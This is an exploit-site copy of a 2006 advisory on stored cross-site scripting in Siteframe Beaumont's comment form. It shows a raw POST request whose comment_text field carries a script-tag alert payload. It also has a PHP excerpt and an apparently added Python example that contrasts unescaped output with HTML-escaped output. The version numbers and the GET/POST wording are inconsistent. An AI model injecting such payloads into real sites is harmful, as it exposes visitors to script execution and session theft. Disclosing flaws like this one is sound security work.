Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

CVE: (not listed)
Category: CWE-79
Price: Not specified
Severity: High
Author: Not specified
Risk: High
Exploitation Type: Remote
Date: 2006-02-24
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006020049

Below is a copy:

Siteframe Beaumont 5.0.2 <== User Comment Cross-Site Scripting Vulnerability

####################################

Information of Software:

Software: Siteframe Beaumont 5.0.1a  
Site: http://www.siteframe.org/
Description of software: Siteframe is a lightweight content-management 
system designed for the rapid deployment of community-based websites. 
With Siteframe, a group of users can share stories and photographs, create blogs, 
send email to one another, and participate in group activities.

####################################

Bug:

Siteframe contains a flaw that allows a remote cross-site scripting attack. 
The vulnerability is in the user comment page: a user can modify the GET 
function and insert the XSS code.

- HTTP POST request

http://[target]/edit/Comment
POST /edit/Comment HTTP/1.1
Host: [target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=Hi&_submitted=1

but we can modify the POST request in this way:

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=<script>alert("lol");</script>&_submitted=1

---------------------------------------------------------

Example:

You can insert XSS code in the post text, or you can modify the request in this way:

comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to=&comment_subject=Kiki&comment_text=[XSS]&_submitted=1

---------------------------------------------------------

The bug is in this part of page.php:

[...]
    // get the comments
    if ($p->get('allow_comments'))   // are comments allowed?
    {
        // display comments
        if (config('threaded_comments'))
            $clist = $p->get_threaded_comments();
        else
            $clist = $p->get_comments();
        $PAGE->assign('comments', $clist);
        $PAGE->assign('num_comments', count($clist));

        // now, create a comment form
        $c = new Comment;
        $c->set('comment_page_id', $p->id());
        $PAGE->assign('comment_form', $c->form());
    }
[...]
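The defect described above is that comment_text is stored as submitted and later handed to the page template without output encoding. As an added illustration (not Siteframe's code), the following Python parses the second POST body quoted in the advisory and renders the comment twice: verbatim, as the vulnerable page does, and HTML-escaped, so the browser treats the payload as text. The rendering markup is an assumption; the field names and values come from the advisory.

```python
from html import escape
from urllib.parse import unquote_plus

# Constructed sample: the modified POST body from the advisory, exactly as it
# would arrive at /edit/Comment (the browser sends <, > and " unencoded here).
SAMPLE_BODY = (
    "comment_id=&comment_user_id=554&comment_page_id=116&comment_reply_to="
    '&comment_subject=Kiki&comment_text=<script>alert("lol");</script>&_submitted=1'
)


def parse_comment(body: str) -> dict:
    """Decode the urlencoded form into the fields the Comment form submits.

    Split on '&' only: the payload contains ';', which some parsers also
    treat as a separator and would silently truncate the field.
    """
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def render_unsafe(comment: dict) -> str:
    """Mirrors the vulnerable behaviour: stored text is placed into HTML verbatim."""
    return (f'<div class="comment"><b>{comment["comment_subject"]}</b>: '
            f'{comment["comment_text"]}</div>')


def render_escaped(comment: dict) -> str:
    """Fixed behaviour: HTML-encode every user-controlled field at output time."""
    subject = escape(comment["comment_subject"], quote=True)
    text = escape(comment["comment_text"], quote=True)
    return f'<div class="comment"><b>{subject}</b>: {text}</div>'


def contains_raw_script(html_fragment: str) -> bool:
    """Shows the difference between the two renderings; encoding is the real fix."""
    return "<script" in html_fragment.lower()


if __name__ == "__main__":
    c = parse_comment(SAMPLE_BODY)
    print(render_unsafe(c))   # the script tag survives into the page
    print(render_escaped(c))  # &lt;script&gt;...&lt;/script&gt; is displayed as text
```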

####################################

Credit:

Author:  Kiki
e-mail: federico.sana (at) alice (dot) it
web page: http://kiki91.altervista.org

####################################

Copyright ©2024 Exploitalert.